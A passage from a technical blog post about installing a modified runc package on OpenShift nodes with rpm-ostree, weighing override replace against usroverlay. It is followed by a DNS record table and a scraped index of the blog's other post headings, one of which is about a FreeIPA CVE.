  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -> 1.0.0-97.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot
To reset all overrides, execute rpm-ostree reset:
sh-4.4# rpm-ostree reset
Staging deployment... done
Freed: 54.8 MB (pkgcache branches: 0)
Downgraded:
  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -> 1.0.0-97.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot
Discussion §
I achieved my goal of installed a modified runc executable on an
OpenShift node. There were two approaches:

rpm-ostree usroverlay creates a writable overlay on /usr.
The overlay disappears at reboot, which is fine for my testing
needs. This technique doesn’t work from a node debug container;
you have to log in over SSH, which requires additional steps to
add SSH keys.
rpm-ostree override replace overrides a particular package RPM.
The change takes effect after reboot and is persistent. It is
easy to rollback or reset the override. This technique does not
require SSH login; it works fine in a node debug container.

Because I needed to build my package in a RHEL 8.4 / RHCOS 4.8
buildroot, I used Brew. The build artifacts are RPMs. Therefore
rpm-ostree override replace is the most convenient option for me.
Both options apply changes per-node. After confirming with CoreOS
developers, there is currently no way to roll out a package override
cluster-wide or to a defined group of nodes (e.g. to
MachineConfigPool/worker via a MachineConfig). So for now, you
either have to apply changes/overrides on specific nodes, or build
the whole machine-os-content image and upgrade the cluster. As a
container runtime developer, my sweet spot is in a gulf between the
existing options. I can tolerate this mild annoyance on the
assumption that it discourages messing around in production
environments.
In the meantime, now that I have worked out how to install my
modified runc onto worker nodes, I will get on with testing it!

Ingress endpoint	Resolution method	Records needed
`hostname`	direct	`CNAME`
`hostname`	SRV	`SRV`
`ip`	direct	`A`/`AAAA`
`ip`	SRV	`A`/`AAAA` and `SRV`

Fraser's IdM Blog

CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability

CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability

Executive summary §

Affected versions §

Timeline §

Problem description §

Sanitisation not performed §

Demo 1: Attacker-supplied rfc822Name §

Setup §

Exploit §

Demo 2: Wildcard DNS name §

Setup §

Exploit §

Discussion §

Mitigations §

Use exact certificate matching / do not use certmap rules §

Audit and de-risk certmap rules §

Review CA trust, profiles and validation §

Fix §

Enabling Kubernetes feature gates in OpenShift

Enabling Kubernetes feature gates in OpenShift

The FeatureGate resource §

Enabling specific feature gates §

Applying FeatureGate changes §

Controlling header formatting in JAX-RS applications

Controlling header formatting in JAX-RS applications

Specifying the Content-Type header §

Idea 1: custom HeaderDelegate §

Idea 2: response filter §

Conclusion §

Experimenting with ExternalDNS

Experimenting with ExternalDNS

Operator installation §

The ExternalDNS custom resource §

Creating the ExternalDNS controller §

Observing record creation §

SRV records for LoadBalancer Services §

SRV records for NodePort services §

Conclusion §

Running Pods in user namespaces without privileged SCCs

Running Pods in user namespaces without privileged SCCs

Cluster configuration §

Problem demonstration §

Solution §

Why runAsUser must be specified §

Using multiple UIDs §

Conclusion §

Bare TCP and UDP ingress on Kubernetes

Bare TCP and UDP ingress on Kubernetes

Example service §

Create Service object §

Testing the ingress §

Reaching the service via DNS §

Creating user namespaces inside containers

Creating user namespaces inside containers

Demo §

Discussion §

Demo: namespaced systemd workloads on OpenShift

Demo: namespaced systemd workloads on OpenShift

The journey so far §

OpenShift and user namespaces §

User namespaces in OpenShift via CRI-O annotations §

User namespace support in OpenShift 4.7 §

Multiple users in user namespaces on OpenShift §

systemd containers on OpenShift with cgroups v2 §

Using runc to explore the OCI Runtime Specification §

systemd, cgroups and subuid ranges §

Modifying runc to chown the container cgroup §

Demo §

Install modified runc package §

Enable user namespaces and cgroups v2 §

Create project and user §

Create service and route §

Create pod §

Verify sandbox §

Next steps §

FreeIPA on OpenShift: July 2021 update

FreeIPA on OpenShift: July 2021 update

Live-testing changes in OpenShift clusters

Demo 1: Attacker-supplied `rfc822Name` §

The `FeatureGate` resource §

Applying `FeatureGate` changes §

Specifying the `Content-Type` header §

Idea 1: custom `HeaderDelegate` §

The `ExternalDNS` custom resource §

SRV records for `LoadBalancer` Services §

SRV records for `NodePort` services §

Why `runAsUser` must be specified §

Using `runc` to explore the OCI Runtime Specification §

Modifying `runc` to `chown` the container cgroup §

Install modified `runc` package §

`usroverlay` via debug container (doesn’t work) §

`usroverlay` via SSH §

`override replace` via node debug container §